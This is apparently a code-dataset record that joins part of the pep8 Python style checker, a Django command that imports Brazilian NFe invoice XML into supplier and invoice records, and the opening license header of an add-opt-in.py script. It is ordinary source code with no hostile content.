comparison_to_singleton(logical_line, noqa): r"""Comparison to singletons should use "is" or "is not". Comparisons to singletons like None should always be done with "is" or "is not", never the equality operators. Okay: if arg is not None: E711: if arg != None: E711: if None == arg: E712: if arg == True: E712: if False == arg: Also, beware of writing if x when you really mean if x is not None -- e.g. when testing whether a variable or argument that defaults to None was set to some other value. The other value might have a type (such as a container) that could be false in a boolean context! """ match = not noqa and COMPARE_SINGLETON_REGEX.search(logical_line) if match: singleton = match.group(1) or match.group(3) same = (match.group(2) == '==') msg = "'if cond is %s:'" % (('' if same else 'not ') + singleton) if singleton in ('None',): code = 'E711' else: code = 'E712' nonzero = ((singleton == 'True' and same) or (singleton == 'False' and not same)) msg += " or 'if %scond:'" % ('' if nonzero else 'not ') yield match.start(2), ("%s comparison to %s should be %s" % (code, singleton, msg)) def comparison_negative(logical_line): r"""Negative comparison should be done using "not in" and "is not". Okay: if x not in y:\n pass Okay: assert (X in Y or X is Z) Okay: if not (X in Y):\n pass Okay: zz = x is not y E713: Z = not X in Y E713: if not X.B in Y:\n pass E714: if not X is Y:\n pass E714: Z = not X.B is Y """ match = COMPARE_NEGATIVE_REGEX.search(logical_line) if match: pos = match.start(1) if match.group(2) == 'in': yield pos, "E713 test for membership should be 'not in'" else: yield pos, "E714 test for object identity should be 'is not'" def comparison_type(logical_line): r"""Object type comparisons should always use isinstance(). Do not compare types directly. Okay: if isinstance(obj, int): E721: if type(obj) is type(1): When checking if an object is a string, keep in mind that it might be a unicode string too! In Python 2.3, str and unicode have a common base class, basestring, so you can do: Okay: if isinstance(obj, basestring): Okay: if type(a1) is type(b1): """ match = COMPARE_TYPE_REGEX.search(logical_line) if match: inst = match.group(1) if inst and isidentifier(inst) and inst not in SINGLETONS: return # Allow comparison for types which are not obvious yield match.start(), "E721 do not compare types, use 'isinstance()'" def python_3000_has_key(logical_line, noqa): r"""The {}.has_key() method is removed in Python 3: use the 'in' operator. Okay: if "alph" in d:\n print d["alph"] W601: assert d.has_key('alph') """ pos = logical_line.find('.has_key(') if pos > -1 and not noqa: yield pos, "W601 .has_key() is deprecated, use 'in'" def python_3000_raise_comma(logical_line): r"""When raising an exception, use "raise ValueError('message')". The older form is removed in Python 3. Okay: raise DummyError("Message") W602: raise DummyError, "Message" """ match = RAISE_COMMA_REGEX.match(logical_line) if match and not RERAISE_COMMA_REGEX.match(logical_line): yield match.end() - 1, "W602 deprecated form of raising exception" def python_3000_not_equal(logical_line): r"""New code should always use != instead of <>. The older syntax is removed in Python 3. Okay: if a != 'no': W603: if a <> 'no': """ pos = logical_line.find('<>') if pos > -1: yield pos, "W603 '<>' is deprecated, use '!='" def python_3000_backticks(logical_line): r"""Backticks are removed in Python 3: use repr() instead. Okay: val = repr(1 + 2) W604: val = `1 + 2` """ pos = logical_line.find('`') if pos > -1: yield pos, "W604 backticks are deprecated, use 'repr()'" ############################################################################## # Helper functions ############################################################################## if '' == ''.encode(): # Python 2: implicit encoding. def readlines(filename): """Read the source code.""" with open(filename, 'rU') as f: return f.readlines() isidentifier = re.compile(r'[a-zA-Z_]\w*$').match stdin_get_value = sys.stdin.read else: # Python 3 def readlines(filename): """Read the source code.""" try: with open(filename, 'rb') as f: (coding, lines) = tokenize.detect_encoding(f.readline) f = TextIOWrapper(f, coding, line_buffering=True) return [l.decode(coding) for l in lines] + f.readlines() except (LookupError, SyntaxError, UnicodeError): # Fall back if file encoding is improperly declared with open(filename, encoding='latin-1') as f: return f.readlines() isidentifier = str.isidentifier def stdin_get_value(): return TextIOWrapper(sys.stdin.buffer, errors='ignore').read() noqa = re.compile(r'# no(?:qa|pep8)\b', re.I).search def expand_indent(line): r"""Return the amount of indentation. Tabs are expanded to the next multiple of 8. >>> expand_indent(' ') 4 >>> expand_indent('\t') 8 >>> expand_indent(' \t') 8 >>> expand_indent(' \t') 16 """ if '\t' not in line: return len(line) - len(line.lstrip()) result = 0 for char in line: if char == '\t': result = result // 8 * 8 + 8 elif char == ' ': result += 1 else: break return result def mute_string(text): """Replace contents with 'xxx' to prevent syntax matching. >>> mute_string('"abc"') '"xxx"' >>> mute_string("'''abc'''") "'''xxx'''" >>> mute_string("r'abc'") "r'xxx'" """ # String modifiers (e.g. u or r) start = text.index(text[-1]) + 1 end = len(text) - 1 # Triple quotes if text[-3:] in ('"""', "'''"): start += 2 end -= 2 return text[:start] + 'x' * (end - start) + text[end:] def parse_udiff(diff, patterns=None, parent='.'): """Return a dictionary of matching lines.""" # For each file of the diff, the entry key is the filename, # and the value is a set of row numbers to consider. rv = {} path = nrows = None for line in diff.splitlines(): if nrows: if line[:1] != '-': nrows -= 1 continue if line[:3] == '@@ ': hunk_match = HUNK_REGEX.match(line) (row, nrows) = [int(g or '1') for g in hunk_match.groups()] rv[path].update(range(row, row + nrows)) elif line[:3] == '+++': path = line[4:].split('\t', 1)[0] if path[:2] == 'b/': path = path[2:] rv[path] = set() return dict([(os.path.join(parent, path), rows) for (path, rows) in rv.items() if rows and filename_match(path, patterns)]) def normalize_paths(value, parent=os.curdir): """Parse a comma-separated list of paths. Return a list of absolute paths. """ if not value: return [] if isinstance(value, list): return value paths = [] for path in value.split(','): path = path.strip() if '/' in path: path = os.path.abspath(os.path.join(parent, path)) paths.append(path.rstrip('/')) return paths def filename_match(filename, patterns, default=True): """Check if patterns contains a pattern that matches filename. If patterns is unspecified, this always returns True. """ if not patterns: return default return any(fnmatch(filename, pattern) for pattern in patterns) def _is_eol_token(token): return token[0] in NEWLINE or token[4][token[3][1]:].lstrip() == '\\\n' if COMMENT_WITH_NL: def _is_eol_token(token, _eol_token=_is_eol_token): return _eol_token(token) or (token[0] == tokenize.COMMENT and token[1] == token[4]) ############################################################################## # Framework to run all checks ############################################################################## _checks = {'physical_line': {}, 'logical_line': {}, 'tree': {}} def register_check(check, codes=None): """Register a new check object.""" def _add_check(check, kind, codes, args): if check in _checks[kind]: _checks[kind][check][0].extend(codes or []) else: _checks[kind][check] = (codes or [''], args) if inspect.isfunction(check): args = inspect.getargspec(check)[0] if args and args[0] in ('physical_line', 'logical_line'): if codes is None: codes = ERRORCODE_REGEX.findall(check.__doc__ or '') _add_check(check, args[0], codes, args) elif inspect.isclass(check): if inspect.getargspec(check.__init__)[0][:2] == ['self', 'tree']: _add_check(check, 'tree', codes, None) def init_checks_registry(): """Register all globally visible functions. The first argument name is either 'physical_line' or 'logical_line'. """ mod = inspect.getmodule(register_check) for (name, function) in inspect.getmembers(mod, inspect.isfunction): register_check(function) init_checks_registry() class Checker(object): """Load a Python source file, tokenize it, check coding style.""" def __init__(self, filename=None, lines=None, options=None, report=None, **kwargs): if options is None: options = StyleGuide(kwargs).options else: assert not kwargs self._io_error = None self._physical_checks = options.physical_checks self._logical_checks = options.logical_checks self._ast_checks = options.ast_checks self.max_line_length = options.max_line_length self.multiline = False # in a multiline string? self.hang_closing = options.hang_closing self.verbose = options.verbose self.filename = filename # Dictionary where a checker can store its custom state. self._checker_states = {} if filename is None: self.filename = 'stdin' self.lines = lines or [] elif filename == '-': self.filename = 'stdin' self.lines = stdin_get_value().splitlines(True) elif lines is None: try: self.lines = readlines(filename) except IOError: (exc_type, exc) = sys.exc_info()[:2] self._io_error = '%s: %s' % (exc_type.__name__, exc) self.lines = [] else: self.lines = lines if self.lines: ord0 = ord(self.lines[0][0]) if ord0 in (0xef, 0xfeff): # Strip the UTF-8 BOM if ord0 == 0xfeff: self.lines[0] = self.lines[0][1:] elif self.lines[0][:3] == '\xef\xbb\xbf': self.lines[0] = self.lines[0][3:] self.report = report or options.report self.report_error = self.report.error def report_invalid_syntax(self): """Check if the syntax is valid.""" (exc_type, exc) = sys.exc_info()[:2] if len(exc.args) > 1: offset = exc.args[1] if len(offset) > 2: offset = offset[1:3] else: offset = (1, 0) self.report_error(offset[0], offset[1] or 0, 'E901 %s: %s' % (exc_type.__name__, exc.args[0]), self.report_invalid_syntax) def readline(self): """Get the next line from the input buffer.""" if self.line_number >= self.total_lines: return '' line = self.lines[self.line_number] self.line_number += 1 if self.indent_char is None and line[:1] in WHITESPACE: self.indent_char = line[0] return line def run_check(self, check, argument_names): """Run a check plugin.""" arguments = [] for name in argument_names: arguments.append(getattr(self, name)) return check(*arguments) def init_checker_state(self, name, argument_names): """ Prepares a custom state for the specific checker plugin.""" if 'checker_state' in argument_names: self.checker_state = self._checker_states.setdefault(name, {}) def check_physical(self, line): """Run all physical checks on a raw input line.""" self.physical_line = line for name, check, argument_names in self._physical_checks: self.init_checker_state(name, argument_names) result = self.run_check(check, argument_names) if result is not None: (offset, text) = result self.report_error(self.line_number, offset, text, check) if text[:4] == 'E101': self.indent_char = line[0] def build_tokens_line(self): """Build a logical line from tokens.""" logical = [] comments = [] length = 0 prev_row = prev_col = mapping = None for token_type, text, start, end, line in self.tokens: if token_type in SKIP_TOKENS: continue if not mapping: mapping = [(0, start)] if token_type == tokenize.COMMENT: comments.append(text) continue if token_type == tokenize.STRING: text = mute_string(text) if prev_row: (start_row, start_col) = start if prev_row != start_row: # different row prev_text = self.lines[prev_row - 1][prev_col - 1] if prev_text == ',' or (prev_text not in '{[(' and text not in '}])'): text = ' ' + text elif prev_col != start_col: # different column text = line[prev_col:start_col] + text logical.append(text) length += len(text) mapping.append((length, end)) (prev_row, prev_col) = end self.logical_line = ''.join(logical) self.noqa = comments and noqa(''.join(comments)) return mapping def check_logical(self): """Build a line from tokens and run all logical checks on it.""" self.report.increment_logical_line() mapping = self.build_tokens_line() if not mapping: return (start_row, start_col) = mapping[0][1] start_line = self.lines[start_row - 1] self.indent_level = expand_indent(start_line[:start_col]) if self.blank_before < self.blank_lines: self.blank_before = self.blank_lines if self.verbose >= 2: print(self.logical_line[:80].rstrip()) for name, check, argument_names in self._logical_checks: if self.verbose >= 4: print(' ' + name) self.init_checker_state(name, argument_names) for offset, text in self.run_check(check, argument_names) or (): if not isinstance(offset, tuple): for token_offset, pos in mapping: if offset <= token_offset: break offset = (pos[0], pos[1] + offset - token_offset) self.report_error(offset[0], offset[1], text, check) if self.logical_line: self.previous_indent_level = self.indent_level self.previous_logical = self.logical_line self.blank_lines = 0 self.tokens = [] def check_ast(self): """Build the file's AST and run all AST checks.""" try: tree = compile(''.join(self.lines), '', 'exec', PyCF_ONLY_AST) except (SyntaxError, TypeError): return self.report_invalid_syntax() for name, cls, __ in self._ast_checks: checker = cls(tree, self.filename) for lineno, offset, text, check in checker.run(): if not self.lines or not noqa(self.lines[lineno - 1]): self.report_error(lineno, offset, text, check) def generate_tokens(self): """Tokenize the file, run physical line checks and yield tokens.""" if self._io_error: self.report_error(1, 0, 'E902 %s' % self._io_error, readlines) tokengen = tokenize.generate_tokens(self.readline) try: for token in tokengen: if token[2][0] > self.total_lines: return self.maybe_check_physical(token) yield token except (SyntaxError, tokenize.TokenError): self.report_invalid_syntax() def maybe_check_physical(self, token): """If appropriate (based on token), check current physical line(s).""" # Called after every token, but act only on end of line. if _is_eol_token(token): # Obviously, a newline token ends a single physical line. self.check_physical(token[4]) elif token[0] == tokenize.STRING and '\n' in token[1]: # Less obviously, a string that contains newlines is a # multiline string, either triple-quoted or with internal # newlines backslash-escaped. Check every physical line in the # string *except* for the last one: its newline is outside of # the multiline string, so we consider it a regular physical # line, and will check it like any other physical line. # # Subtleties: # - we don't *completely* ignore the last line; if it contains # the magical "# noqa" comment, we disable all physical # checks for the entire multiline string # - have to wind self.line_number back because initially it # points to the last line of the string, and we want # check_physical() to give accurate feedback if noqa(token[4]): return self.multiline = True self.line_number = token[2][0] for line in token[1].split('\n')[:-1]: self.check_physical(line + '\n') self.line_number += 1 self.multiline = False def check_all(self, expected=None, line_offset=0): """Run all checks on the input file.""" self.report.init_file(self.filename, self.lines, expected, line_offset) self.total_lines = len(self.lines) if self._ast_checks: self.check_ast() self.line_number = 0 self.indent_char = None self.indent_level = self.previous_indent_level = 0 self.previous_logical = '' self.tokens = [] self.blank_lines = self.blank_before = 0 parens = 0 for token in self.generate_tokens(): self.tokens.append(token) token_type, text = token[0:2] if self.verbose >= 3: if token[2][0] == token[3][0]: pos = '[%s:%s]' % (token[2][1] or '', token[3][1]) else: pos = 'l.%s' % token[3][0] print('l.%s\t%s\t%s\t%r' % (token[2][0], pos, tokenize.tok_name[token[0]], text)) if token_type == tokenize.OP: if text in '([{': parens += 1 elif text in '}])': parens -= 1 elif not parens: if token_type in NEWLINE: if token_type == tokenize.NEWLINE: self.check_logical() self.blank_before = 0 elif len(self.tokens) == 1: # The physical line contains only this token. self.blank_lines += 1 del self.tokens[0] else: self.check_logical() elif COMMENT_WITH_NL and token_type == tokenize.COMMENT: if len(self.tokens) == 1: # The comment also ends a physical line token = list(token) token[1] = text.rstrip('\r\n') token[3] = (token[2][0], token[2][1] + len(token[1])) self.tokens = [tuple(token)] self.check_logical() if self.tokens: self.check_physical(self.lines[-1]) self.check_logical() return self.report.get_file_results() class BaseReport(object): """Collect the results of the checks.""" print_filename = False def __init__(self, options): self._benchmark_keys = options.benchmark_keys self._ignore_code = options.ignore_code # Results self.elapsed = 0 self.total_errors = 0 self.counters = dict.fromkeys(self._benchmark_keys, 0) self.messages = {} def start(self): """Start the timer.""" self._start_time = time.time() def stop(self): """Stop the timer.""" self.elapsed = time.time() - self._start_time def init_file(self, filename, lines, expected, line_offset): """Signal a new file.""" self.filename = filename self.lines = lines self.expected = expected or () self.line_offset = line_offset self.file_errors = 0 self.counters['files'] += 1 self.counters['physical lines'] += len(lines) def increment_logical_line(self): """Signal a new logical line.""" self.counters['logical lines'] += 1 def error(self, line_number, offset, text, check): """Report an error, according to options.""" code = text[:4] if self._ignore_code(code): return if code in self.counters: self.counters[code] += 1 else: self.counters[code] = 1 self.messages[code] = text[5:] # Don't care about expected errors or warnings if code in self.expected: return if self.print_filename and not self.file_errors: print(self.filename) self.file_errors += 1 self.total_errors += 1 return code def get_file_results(self): """Return the count of errors and warnings for this file.""" return self.file_errors def get_count(self, prefix=''): """Return the total count of errors and warnings.""" return sum([self.counters[key] for key in self.messages if key.startswith(prefix)]) def get_statistics(self, prefix=''): """Get statistics for message codes that start with the prefix. prefix='' matches all errors and warnings prefix='E' matches all errors prefix='W' matches all warnings prefix='E4' matches all errors that have to do with imports """ return ['%-7s %s %s' % (self.counters[key], key, self.messages[key]) for key in sorted(self.messages) if key.startswith(prefix)] def print_statistics(self, prefix=''): """Print overall statistics (number of errors and warnings).""" for line in self.get_statistics(prefix): print(line) def print_benchmark(self): """Print benchmark numbers.""" print('%-7.2f %s' % (self.elapsed, 'seconds elapsed')) if self.elapsed: for key in self._benchmark_keys: print('%-7d %s per second (%d total)' % (self.counters[key] / self.elapsed, key, self.counters[key])) class FileReport(BaseReport): """Collect the results of the checks and print only the filenames.""" print_filename = True class StandardReport(BaseReport): """Collect and print the results of the checks.""" def __init__(self, options): super(StandardReport, self).__init__(options) self._fmt = REPORT_FORMAT.get(options.format.lower(), options.format) self._repeat = options.repeat self._show_source = options.show_source self._show_pep8 = options.show_pep8 def init_file(self, filename, lines, expected, line_offset): """Signal a new file.""" self._deferred_print = [] return super(StandardReport, self).init_file( filename, lines, expected, line_offset) def error(self, line_number, offset, text, check): """Report an error, according to options.""" code = super(StandardReport, self).error(line_number, offset, text, check) if code and (self.counters[code] == 1 or self._repeat): self._deferred_print.append( (line_number, offset, code, text[5:], check.__doc__)) return code def get_file_results(self): """Print the result and return the overall count for this file.""" self._deferred_print.sort() for line_number, offset, code, text, doc in self._deferred_print: print(self._fmt % { 'path': self.filename, 'row': self.line_offset + line_number, 'col': offset + 1, 'code': code, 'text': text, }) if self._show_source: if line_number > len(self.lines): line = '' else: line = self.lines[line_number - 1] print(line.rstrip()) print(re.sub(r'\S', ' ', line[:offset]) + '^') if self._show_pep8 and doc: print(' ' + doc.strip()) return self.file_errors class DiffReport(StandardReport): """Collect and print the results for the changed lines only.""" def __init__(self, options): super(DiffReport, self).__init__(options) self._selected = options.selected_lines def error(self, line_number, offset, text, check): if line_number not in self._selected[self.filename]: return return super(DiffReport, self).error(line_number, offset, text, check) class StyleGuide(object): """Initialize a PEP-8 instance with few options.""" def __init__(self, *args, **kwargs): # build options from the command line self.checker_class = kwargs.pop('checker_class', Checker) parse_argv = kwargs.pop('parse_argv', False) config_file = kwargs.pop('config_file', None) parser = kwargs.pop('parser', None) # build options from dict options_dict = dict(*args, **kwargs) arglist = None if parse_argv else options_dict.get('paths', None) options, self.paths = process_options( arglist, parse_argv, config_file, parser) if options_dict: options.__dict__.update(options_dict) if 'paths' in options_dict: self.paths = options_dict['paths'] self.runner = self.input_file self.options = options if not options.reporter: options.reporter = BaseReport if options.quiet else StandardReport options.select = tuple(options.select or ()) if not (options.select or options.ignore or options.testsuite or options.doctest) and DEFAULT_IGNORE: # The default choice: ignore controversial checks options.ignore = tuple(DEFAULT_IGNORE.split(',')) else: # Ignore all checks which are not explicitly selected options.ignore = ('',) if options.select else tuple(options.ignore) options.benchmark_keys = BENCHMARK_KEYS[:] options.ignore_code = self.ignore_code options.physical_checks = self.get_checks('physical_line') options.logical_checks = self.get_checks('logical_line') options.ast_checks = self.get_checks('tree') self.init_report() def init_report(self, reporter=None): """Initialize the report instance.""" self.options.report = (reporter or self.options.reporter)(self.options) return self.options.report def check_files(self, paths=None): """Run all checks on the paths.""" if paths is None: paths = self.paths report = self.options.report runner = self.runner report.start() try: for path in paths: if os.path.isdir(path): self.input_dir(path) elif not self.excluded(path): runner(path) except KeyboardInterrupt: print('... stopped') report.stop() return report def input_file(self, filename, lines=None, expected=None, line_offset=0): """Run all checks on a Python source file.""" if self.options.verbose: print('checking %s' % filename) fchecker = self.checker_class( filename, lines=lines, options=self.options) return fchecker.check_all(expected=expected, line_offset=line_offset) def input_dir(self, dirname): """Check all files in this directory and all subdirectories.""" dirname = dirname.rstrip('/') if self.excluded(dirname): return 0 counters = self.options.report.counters verbose = self.options.verbose filepatterns = self.options.filename runner = self.runner for root, dirs, files in os.walk(dirname): if verbose: print('directory ' + root) counters['directories'] += 1 for subdir in sorted(dirs): if self.excluded(subdir, root): dirs.remove(subdir) for filename in sorted(files): # contain a pattern that matches? if ((filename_match(filename, filepatterns) and not self.excluded(filename, root))): runner(os.path.join(root, filename)) def excluded(self, filename, parent=None): """Check if the file should be excluded. Check if 'options.exclude' contains a pattern that matches filename. """ if not self.options.exclude: return False basename = os.path.basename(filename) if filename_match(basename, self.options.exclude): return True if parent: filename = os.path.join(parent, filename) filename = os.path.abspath(filename) return filename_match(filename, self.options.exclude) def ignore_code(self, code): """Check if the error code should be ignored. If 'options.select' contains a prefix of the error code, return False. Else, if 'options.ignore' contains a prefix of the error code, return True. """ if len(code) < 4 and any(s.startswith(code) for s in self.options.select): return False return (code.startswith(self.options.ignore) and not code.startswith(self.options.select)) def get_checks(self, argument_name): """Get all the checks for this category. Find all globally visible functions where the first argument name starts with argument_name and which contain selected tests. """ checks = [] for check, attrs in _checks[argument_name].items(): (codes, args) = attrs if any(not (code and self.ignore_code(code)) for code in codes): checks.append((check.__name__, check, args)) return sorted(checks) def get_parser(prog='pep8', version=__version__): parser = OptionParser(prog=prog, version=version, usage="%prog [options] input ...") parser.config_options = [ 'exclude', 'filename', 'select', 'ignore', 'max-line-length', 'hang-closing', 'count', 'format', 'quiet', 'show-pep8', 'show-source', 'statistics', 'verbose'] parser.add_option('-v', '--verbose', default=0, action='count', help="print status messages, or debug with -vv") parser.add_option('-q', '--quiet', default=0, action='count', help="report only file names, or nothing with -qq") parser.add_option('-r', '--repeat', default=True, action='store_true', help="(obsolete) show all occurrences of the same error") parser.add_option('--first', action='store_false', dest='repeat', help="show first occurrence of each error") parser.add_option('--exclude', metavar='patterns', default=DEFAULT_EXCLUDE, help="exclude files or directories which match these " "comma separated patterns (default: %default)") parser.add_option('--filename', metavar='patterns', default='*.py', help="when parsing directories, only check filenames " "matching these comma separated patterns " "(default: %default)") parser.add_option('--select', metavar='errors', default='', help="select errors and warnings (e.g. E,W6)") parser.add_option('--ignore', metavar='errors', default='', help="skip errors and warnings (e.g. E4,W) " "(default: %s)" % DEFAULT_IGNORE) parser.add_option('--show-source', action='store_true', help="show source code for each error") parser.add_option('--show-pep8', action='store_true', help="show text of PEP 8 for each error " "(implies --first)") parser.add_option('--statistics', action='store_true', help="count errors and warnings") parser.add_option('--count', action='store_true', help="print total number of errors and warnings " "to standard error and set exit code to 1 if " "total is not null") parser.add_option('--max-line-length', type='int', metavar='n', default=MAX_LINE_LENGTH, help="set maximum allowed line length " "(default: %default)") parser.add_option('--hang-closing', action='store_true', help="hang closing bracket instead of matching " "indentation of opening bracket's line") parser.add_option('--format', metavar='format', default='default', help="set the error format [default|pylint|<custom>]") parser.add_option('--diff', action='store_true', help="report only lines changed according to the " "unified diff received on STDIN") group = parser.add_option_group("Testing Options") if os.path.exists(TESTSUITE_PATH): group.add_option('--testsuite', metavar='dir', help="run regression tests from dir") group.add_option('--doctest', action='store_true', help="run doctest on myself") group.add_option('--benchmark', action='store_true', help="measure processing speed") return parser def read_config(options, args, arglist, parser): """Read both user configuration and local configuration.""" config = RawConfigParser() user_conf = options.config if user_conf and os.path.isfile(user_conf): if options.verbose: print('user configuration: %s' % user_conf) config.read(user_conf) local_dir = os.curdir parent = tail = args and os.path.abspath(os.path.commonprefix(args)) while tail: if config.read([os.path.join(parent, fn) for fn in PROJECT_CONFIG]): local_dir = parent if options.verbose: print('local configuration: in %s' % parent) break (parent, tail) = os.path.split(parent) pep8_section = parser.prog if config.has_section(pep8_section): option_list = dict([(o.dest, o.type or o.action) for o in parser.option_list]) # First, read the default values (new_options, __) = parser.parse_args([]) # Second, parse the configuration for opt in config.options(pep8_section): if opt.replace('_', '-') not in parser.config_options: print(" unknown option '%s' ignored" % opt) continue if options.verbose > 1: print(" %s = %s" % (opt, config.get(pep8_section, opt))) normalized_opt = opt.replace('-', '_') opt_type = option_list[normalized_opt] if opt_type in ('int', 'count'): value = config.getint(pep8_section, opt) elif opt_type == 'string': value = config.get(pep8_section, opt) if normalized_opt == 'exclude': value = normalize_paths(value, local_dir) else: assert opt_type in ('store_true', 'store_false') value = config.getboolean(pep8_section, opt) setattr(new_options, normalized_opt, value) # Third, overwrite with the command-line options (options, __) = parser.parse_args(arglist, values=new_options) options.doctest = options.testsuite = False return options def process_options(arglist=None, parse_argv=False, config_file=None, parser=None): """Process options passed either via arglist or via command line args.""" if not parser: parser = get_parser() if not parser.has_option('--config'): if config_file is True: config_file = DEFAULT_CONFIG group = parser.add_option_group("Configuration", description=( "The project options are read from the [%s] section of the " "tox.ini file or the setup.cfg file located in any parent folder " "of the path(s) being processed. Allowed options are: %s." % (parser.prog, ', '.join(parser.config_options)))) group.add_option('--config', metavar='path', default=config_file, help="user config file location (default: %default)") # Don't read the command line if the module is used as a library. if not arglist and not parse_argv: arglist = [] # If parse_argv is True and arglist is None, arguments are # parsed from the command line (sys.argv) (options, args) = parser.parse_args(arglist) options.reporter = None if options.ensure_value('testsuite', False): args.append(options.testsuite) elif not options.ensure_value('doctest', False): if parse_argv and not args: if options.diff or any(os.path.exists(name) for name in PROJECT_CONFIG): args = ['.'] else: parser.error('input not specified') options = read_config(options, args, arglist, parser) options.reporter = parse_argv and options.quiet == 1 and FileReport options.filename = options.filename and options.filename.split(',') options.exclude = normalize_paths(options.exclude) options.select = options.select and options.select.split(',') options.ignore = options.ignore and options.ignore.split(',') if options.diff: options.reporter = DiffReport stdin = stdin_get_value() options.selected_lines = parse_udiff(stdin, options.filename, args[0]) args = sorted(options.selected_lines) return options, args def _main(): """Parse options and run checks on Python source.""" import signal # Handle "Broken pipe" gracefully try: signal.signal(signal.SIGPIPE, lambda signum, frame: sys.exit(1)) except AttributeError: pass # not supported on Windows pep8style = StyleGuide(parse_argv=True, config_file=True) options = pep8style.options if options.doctest or options.testsuite: from testsuite.support import run_tests report = run_tests(pep8style) else: report = pep8style.check_files() if options.statistics: report.print_statistics() if options.benchmark: report.print_benchmark() if options.testsuite and not options.quiet: report.print_results() if report.total_errors: if options.count: sys.stderr.write(str(report.total_errors) + '\n') sys.exit(1) if __name__ == '__main__': _main()
gpl-3.0
-6,555,471,524,927,298,000
37.790914
79
0.56164
false
dudanogueira/microerp
microerp/producao/management/commands/nfe.py
1
6041
# -*- coding: utf-8 -*- from django.core.management.base import BaseCommand from django.contrib.sites.models import Site from cadastro.models import Cidade, Bairro from rh.models import Funcionario, PeriodoTrabalhado, Cargo, Departamento from account.models import User from optparse import make_option import os, csv, datetime from django.utils.encoding import smart_unicode, smart_str from xml.dom import minidom from producao.models import FabricanteFornecedor from producao.models import NotaFiscal class Command(BaseCommand): help = ''' Importa Nota Fiscal ''' args = "--file notafiscal.xml," option_list = BaseCommand.option_list + ( make_option('--file', action='store_true', dest='arquivo', help='Importa uma nota fiscal', ), ) def handle(self, *args, **options): arquivo = options.get('arquivo') if options['arquivo']: f = args[0] try: xmldoc = minidom.parse(f) infNFE = xmldoc.getElementsByTagName('chNFe')[0] idnfe = infNFE.firstChild.nodeValue[22:34] nome_emissor = xmldoc.getElementsByTagName('xNome')[0] nome = nome_emissor.firstChild.nodeValue print "NOME DO EMISSOR: %s" % nome print "ID NOTA FISCAL %s" % idnfe emissor = xmldoc.getElementsByTagName('emit')[0] cnpj_emissor = xmldoc.getElementsByTagName('CNPJ')[0].firstChild.nodeValue # busca emissor fornecedor,created = FabricanteFornecedor.objects.get_or_create(cnpj=cnpj_emissor) fornecedor.nome = nome fornecedor.save() if created: print "Fornecedor CRIADO: %s" % fornecedor else: print "Fornecedor encrontrado: %s" % fornecedor total = xmldoc.getElementsByTagName('total')[0] frete = total.getElementsByTagName('vFrete')[0].firstChild.nodeValue # criando NFE no sistema nfe_sistema,created = NotaFiscal.objects.get_or_create(fabricante_fornecedor=fornecedor, numero=idnfe) nfe_sistema.taxas_diversas = frete nfe_sistema.save() # pega itens da nota itens = xmldoc.getElementsByTagName('det') for item in itens: # cada item da nota... codigo_produto = item.getElementsByTagName('cProd')[0].firstChild.nodeValue quantidade = item.getElementsByTagName('qCom')[0].firstChild.nodeValue valor_unitario = item.getElementsByTagName('vUnCom')[0].firstChild.nodeValue print u"ITEM: %s" % codigo_produto print u"Quantidade: %s" % quantidade print u"Valor Unitário: %s" % valor_unitario # impostos try: aliquota_icms = float(item.getElementsByTagName('pICMS')[0].firstChild.nodeValue) except: aliquota_icms = 0 try: aliquota_ipi = float(item.getElementsByTagName('pIPI')[0].firstChild.nodeValue) except: aliquota_ipi = 0 try: aliquota_pis = float(item.getElementsByTagName('pPIS')[0].firstChild.nodeValue) except: aliquota_pis = 0 try: aliquota_cofins = float(item.getElementsByTagName('pCOFINS')[0].firstChild.nodeValue) except: aliquota_cofins = 0 total_impostos = aliquota_ipi + aliquota_icms + aliquota_cofins + aliquota_cofins total_impostos = aliquota_ipi print "Valor %% ICMS: %s" % aliquota_icms print "Valor %% IPI: %s" % aliquota_ipi print "Valor %% COFNS: %s" % aliquota_cofins print "Valor %% PIS: %s" % aliquota_pis print "Incidência de %% impostos: %s" % total_impostos # busca o lancamento, para evitar dois lancamentos iguais do mesmo partnumber item_lancado,created = nfe_sistema.lancamentocomponente_set.get_or_create(part_number_fornecedor=codigo_produto) # atualiza item_lancado.quantidade= quantidade item_lancado.valor_unitario= valor_unitario item_lancado.impostos= total_impostos # salva item_lancado.save() # busca na memoria automaticamente item_lancado.busca_part_number_na_memoria() # calcula total da nota nfe_sistema.calcula_totais_nota() # printa tudo print "#"*10 print "NOTA %s importada" % nfe_sistema.numero frete = nfe_sistema.taxas_diversas produtos = nfe_sistema.total_com_imposto print "TOTAL DA NOTA: %s (Frete) + %s (Produtos + Impostos)" % (frete, produtos) print "Produtos" for lancamento in nfe_sistema.lancamentocomponente_set.all(): print u"----- PN-FORNECEDOR: %s, QTD: %s VALOR: %s, Impostos: %s%% = TOTAL: %s Unitário (considerando frete proporcional) %s" % (lancamento.part_number_fornecedor, lancamento.quantidade, lancamento.valor_unitario, lancamento.impostos, lancamento.valor_total_com_imposto, lancamento.valor_unitario_final) except FabricanteFornecedor.DoesNotExist: print u"Erro. Não encontrado Fornecedor com este CNPJ" except: raise else: print self.help print self.args
lgpl-3.0
3,257,614,420,050,963,000
45.438462
323
0.549114
false
shinho/SC2
bin/add-opt-in.py
1
7666
#!/usr/bin/env python # Copyright (c) 2012, Adobe Systems Incorporated # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # * Neither the name of Adobe Systems Incorporated nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE 